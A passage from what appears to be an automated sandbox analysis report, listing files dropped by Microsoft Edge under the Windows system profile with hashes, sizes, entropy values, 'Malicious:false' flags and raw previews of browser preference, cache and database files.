                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7Y:fwUQC5VwBIiElEd2K57P7Y
                                                                                                                                                                  MD5:837404F06A30C16EEA2E533893485018
                                                                                                                                                                  SHA1:202AFC7B20C0F0F68E0454958E3D10962C5D7B6C
                                                                                                                                                                  SHA-256:2CC9F07BADD952512A931D682D88F86B3546DFB75B7BB62AD7F4C64155647178
                                                                                                                                                                  SHA-512:292B60D13E446E114A22888863E382CED131E4E1824A1D2B6C71589409255C03E5A676CEBEB4224366599C3DD957A29E55736C1DE64DF7E25CEF45D3F9DC661D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6782159F-1D6C.pma

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.28094476209114055
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:Z8iEkuJ/Y56oSIbuCGNXcnumBFRD3JRGrpkGGwXRGg1DR0SRG:Z8iEkuy56wCXwumBFRD3uNbwg1Ob
                                                                                                                                                                  MD5:3346F4806483982A614843FDB56B9B33
                                                                                                                                                                  SHA1:36C3B076BF9F158877988733399B8A28FF7382D0
                                                                                                                                                                  SHA-256:2963D3B500B7215C4A3C09E2F6F7F4A313B79F1EB5699CF592BFB90A0DAC6AC5
                                                                                                                                                                  SHA-512:760A99C22CD4DD812896A1F3666C74A659F7C1C09EE509B1CBBA1F1D235B2357CE32A77E9CFE84F616DA79EAF13ED23E637DB51EB3B4C7A0F3F2A40657CA59A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@..@...@.....C.].....@................x...x..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..|........".To Be Filled By O.E.M....x86_64P......................>.2...:..............@..<...%...msAutoToggleMSAPrtSSOForNonMSAProfile.......triggered....4..0.......msEdgeContinuousChromeImport....triggered....0..,.......msAutoplayLimitDefault......triggered....,..(.......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\449b6e7f-5636-42fd-8860-a4442803978d.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23768
                                                                                                                                                                  Entropy (8bit):5.594142406778069
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:ySfCt2FRKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OVtLlG9yCxrUl8fpFIOIjuk:y4WKR8F1+UoAYDCx9Tuqh0VfUC9xboge
                                                                                                                                                                  MD5:C877B4142C6D0DE2096BEBBABAFF7929
                                                                                                                                                                  SHA1:ED78B5093C5AB2433BFA8D2A541103098FD27669
                                                                                                                                                                  SHA-256:7434ACB5C81BAB3D6933E83C104F160C0B91AF1AF7844368E7645AECFF162423
                                                                                                                                                                  SHA-512:9EAECA82F4BC50B9BCC1B7113B6ABC2A15108466DDFFF7C7AB538D3E86FE01FBDFEF808034FA922C3B68A101AACFACC27C45F6F1E908F1BCD463E0E9662B7544
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"disable_reasons":1,"state":0},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13381052066563424","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","htt

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\519629a3-ef42-45a8-80a4-1ef3c9ab0f55.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4991
                                                                                                                                                                  Entropy (8bit):4.853640247679089
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:nonz1XFZ1aPjS+wwiIMti+NmdeHP7kGVWQyV+VDCzimF:no1EO+YI3+vIG6h
                                                                                                                                                                  MD5:2BB63119A980829FDECEF22D774FF9A7
                                                                                                                                                                  SHA1:160EBBBEA4591AFADF480830250721FB438D14F6
                                                                                                                                                                  SHA-256:81F5C6866FB40C5719ED93588CA41C83625584A3CF97BD5F8C28F6999C7A983C
                                                                                                                                                                  SHA-512:46C4B072472085A0E4C7DC6D176CCECF8D2EA877C911057BF80F4F7069439999BEA32F2F09A9A6F1C6A59DD9532E5BA8B89C7563494335A1F109BF357AF7BB42
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13381052067045495","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"window_placement":{"bottom":758,"left":10,"maximized":true,"right":1014,"top":10,"work_area_bottom":768,"work_area_left":0,"work_area_right":1024,"work_area_top":0}},"browser_content_container_height":665,"browser_content_container_width":1024,"browser_content_container_x":0,"browser_content_container_y":103,"countryid_at_install":21843,"custom_links":{"list":[]},"data_reduction":{"this_week_number":2871},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13381052067045053"},"download":{"default_directory":""},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_sitelist_location":"","consumer_sitelist_version":"","shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_e

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\6c9220cc-d203-41ca-ad88-6712ed1838ea.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (10950), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10952
                                                                                                                                                                  Entropy (8bit):5.436777880408381
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ngOrMzEOCYmL2glV0TkZBsI3+9uHTYpMrQ0KZQlYX+2I16O:ngOrAEOAljoIng+
                                                                                                                                                                  MD5:26BD2BEEFD8BC1A6FF402DC423AC4E90
                                                                                                                                                                  SHA1:034F433FBBA559B544ACB2047DE9B64C84E818A4
                                                                                                                                                                  SHA-256:C5F2236A084EDB9F0E781F71B5E522E5069F3A0B736C8ADEA576A77A4010B4D6
                                                                                                                                                                  SHA-512:0B55384B6B594655A84CCB99164959066D5BB787EDE0491209806FC740964A6BE2E10178CC7321AC057A8C2D8E82CFBA175002D8F993E4B6E75E8499E66AAF28
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13381052067045495","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"window_placement":{"bottom":758,"left":10,"maximized":true,"right":1014,"top":10,"work_area_bottom":768,"work_area_left":0,"work_area_right":1024,"work_area_top":0}},"browser_content_container_height":665,"browser_content_container_width":1024,"browser_content_container_x":0,"browser_content_container_y":103,"countryid_at_install":21843,"custom_links":{"list":[]},"data_reduction":{"this_week_number":2871,"this_week_services_downstream_foreground_kb":{"109536380":106,"112189210":0,"113604596":3,"12038966":85,"41274743":1,"67541500":5,"70858119":1}},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13381052067045053"},"download":{"default_directory":""},"dual_engi

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\75387db4-416b-4965-9d86-de9deab1a890.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):71757
                                                                                                                                                                  Entropy (8bit):6.771708343960135
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
                                                                                                                                                                  MD5:E5E3377341056643B0494B6842C0B544
                                                                                                                                                                  SHA1:D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
                                                                                                                                                                  SHA-256:E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
                                                                                                                                                                  SHA-512:83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+...........................*...0...;...J...S.h.].X.e.../..0.................!...*...*...2...<...G...P.i.g.Y.m.......1..2..0...0.......+...*...*...1...8...C...M.~.^.m.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\8097023c-d1dd-4803-b7e9-55bb1d2582a4.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):71757
                                                                                                                                                                  Entropy (8bit):6.771708343960135
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
                                                                                                                                                                  MD5:E5E3377341056643B0494B6842C0B544
                                                                                                                                                                  SHA1:D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
                                                                                                                                                                  SHA-256:E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
                                                                                                                                                                  SHA-512:83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+...........................*...0...;...J...S.h.].X.e.../..0.................!...*...*...2...<...G...P.i.g.Y.m.......1..2..0...0.......+...*...*...1...8...C...M.~.^.m.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\8e607794-4d2d-4161-a726-34f92602650a.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (11017), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11019
                                                                                                                                                                  Entropy (8bit):5.4361621555536015
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ng+xzEOCYmL2glV0TkCkBsI3+9uHTYpMrQ0KZQlYX+2I16O:ng+lEOAljuIng+
                                                                                                                                                                  MD5:46636FF2A8B4E750B4C2F8B463427CA2
                                                                                                                                                                  SHA1:C0876CB603E870FAEF7F5915AD0E7CC913965055
                                                                                                                                                                  SHA-256:3C8A24568A6F3BC09878C1A1FEC7494BCB5B2B1EE523F94CFF73C4B1A1722AA4
                                                                                                                                                                  SHA-512:6E80E4FF718D3DF74BBC2E427A5C84687B0D063B8CB4EADA66528B3CAEC391C79615FBE8892925EF5008090044BD712736E0FEF97305BECBEE71DEF33D1DDE13
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13381052067045495","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"window_placement":{"bottom":758,"left":10,"maximized":false,"right":1014,"top":10,"work_area_bottom":768,"work_area_left":0,"work_area_right":1024,"work_area_top":0}},"browser_content_container_height":632,"browser_content_container_width":996,"browser_content_container_x":0,"browser_content_container_y":112,"countryid_at_install":21843,"custom_links":{"list":[]},"data_reduction":{"this_week_number":2871,"this_week_services_downstream_foreground_kb":{"109536380":106,"112189210":0,"113604596":3,"12038966":85,"41274743":1,"4327694":0,"67541500":14,"70858119":1}},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13381052067045053"},"download":{"default_directory":"

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\9c983b64-4606-4236-9a92-5569dfb7f9b1.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (11134), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11136
                                                                                                                                                                  Entropy (8bit):5.433622911855598
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ng+dzEOCYmL2glV0TkCkBsI3+9uHTYpMrQ0KZQlYX+2I86O:ng+xEOAljuIngF
                                                                                                                                                                  MD5:B3D8CEF125CC9A5D47DAC532EADF3E25
                                                                                                                                                                  SHA1:0E7563DE682326AA8EE1F5B66CBA3E60EBEAF786
                                                                                                                                                                  SHA-256:A7D14214BF7E75476D2A26F004925133C79A4BB0850D4A530081F795457E6899
                                                                                                                                                                  SHA-512:F21220E1778EB76AB53D8053987D91078D74F874E142723B202447E0B1DA6DB76B651831CC356DC0F84BE0276C40D375E6327D6ACEC02E2C3C1BDC2EA992A907
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13381052067045495","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"window_placement":{"bottom":758,"left":10,"maximized":false,"right":1014,"top":10,"work_area_bottom":768,"work_area_left":0,"work_area_right":1024,"work_area_top":0}},"browser_content_container_height":632,"browser_content_container_width":996,"browser_content_container_x":0,"browser_content_container_y":112,"countryid_at_install":21843,"custom_links":{"list":[]},"data_reduction":{"this_week_number":2871,"this_week_services_downstream_foreground_kb":{"109536380":106,"112189210":0,"113604596":3,"113711087":10,"12038966":85,"41274743":1,"4327694":0,"67541500":14,"70858119":1}},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13381052067045053"},"download":{"defau

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):513
                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                  MD5:C92EABB217D45C77F8D52725AD3758F0
                                                                                                                                                                  SHA1:43B422AC002BB445E2E9B2C27D74C27CD70C9975
                                                                                                                                                                  SHA-256:388C5C95F0F54F32B499C03A37AABFA5E0A31030EC70D0956A239942544B0EEA
                                                                                                                                                                  SHA-512:DFD5D1C614F0EBFF97F354DFC23266655C336B9B7112781D7579057814B4503D4B63AB1263258BDA3358E5EE9457429C1A2451B22261A1F1E2D8657F31240D3C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                  Entropy (8bit):5.154745962273085
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOnjnPJYDhP5c23oH+Tcwt8Yg2KLl1jauDM+q2TYDhP5c23oH+Tcwt8NIFUv:7njn6PhYebqLrjauQ+vsPhYebpFUv
                                                                                                                                                                  MD5:6750597637E016503D00FD8D8AE195AB
                                                                                                                                                                  SHA1:5971F23C101BAE96E6724DC453B517A57D9B53DF
                                                                                                                                                                  SHA-256:D487FB70EA42E1BF15399DE3228C5AFB75763F15A157745EA2AEA0A640B19DE5
                                                                                                                                                                  SHA-512:07C940CDE5BB02C83DEB91AD9F938047D6FF5F1FEC28309E58028FFAAC354A24055E8CA9CAB1F32ABC2F2D8F3A6FDBC756F7280D607873211750D149FF441723
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:28.902 1a1c Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State since it was missing..2025/01/11-01:54:28.963 1a1c Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):1.2996107769380456
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:LBmw6fU1zBqqOXb47ktEKuRdWVvpmkYqOZY/u7v:LBCyqbL4ooRgwbm/ur
                                                                                                                                                                  MD5:7A1FC00F9DDBBF3754E112C6B8B4F351
                                                                                                                                                                  SHA1:94407D772EE13DC08940C13A8BD77278A4EBE316
                                                                                                                                                                  SHA-256:ED4D8515EEB750327C7CE8C4C1A748E4DBAE0B333E2B4920A5D193D349B91856
                                                                                                                                                                  SHA-512:996B9D7C472C52149BE29CD5EE7C5A104238AD64F4108643A7B790825351CA0CF966BC35A555D31FBEBED7C4981025EA160BD529322625005997FD16AE8EF787
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`.........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
